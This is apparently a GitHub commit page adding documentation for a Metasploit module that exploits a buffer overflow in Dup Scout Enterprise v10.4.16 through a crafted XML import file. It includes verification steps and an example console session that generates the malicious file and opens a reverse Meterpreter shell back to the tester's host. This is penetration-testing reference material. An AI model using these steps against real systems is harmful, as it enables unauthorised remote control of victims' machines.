You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16 by using the import command option to import a specially crafted xml file.
2
+
3
+
## Vulnerable Application
4
+
5
+
This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [www.dupscout.com](http://www.dupscout.com/setups/dupscoutent_setup_v10.4.16.exe).
6
+
7
+
## Verification Steps
8
+
9
+
1. Start msfconsole
10
+
2. Do: `exploit/windows/fileformat/dupscout_xml`
11
+
3. Do: `set PAYLOAD [PAYLOAD]`
12
+
4. Do: `run`
13
+
14
+
## Example
15
+
```
16
+
msf > use exploit/windows/fileformat/dupscout_xml
17
+
msf exploit(windows/fileformat/dupscout_xml) > set PAYLOAD windows/meterpreter/reverse_tcp
18
+
PAYLOAD => windows/meterpreter/reverse_tcp
19
+
msf exploit(windows/fileformat/dupscout_xml) > set LHOST 172.16.40.146
20
+
LHOST => 172.16.40.146
21
+
msf exploit(windows/fileformat/dupscout_xml) > run
22
+
23
+
[*] Creating 'msf.xml' file ...
24
+
[+] msf.xml stored at /root/.msf4/local/msf.xml
25
+
msf exploit(windows/fileformat/dupscout_xml) > use exploit/multi/handler
26
+
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
27
+
PAYLOAD => windows/meterpreter/reverse_tcp
28
+
msf exploit(multi/handler) > set LHOST 172.16.40.146
29
+
LHOST => 172.16.40.146
30
+
msf exploit(multi/handler) > run
31
+
32
+
[*] Started reverse TCP handler on 172.16.40.146:4444
33
+
[*] Sending stage (179779 bytes) to 172.16.40.144
34
+
[*] Meterpreter session 1 opened (172.16.40.146:4444 -> 172.16.40.144:49790) at 2018-01-24 20:56:56 +0000
0 commit comments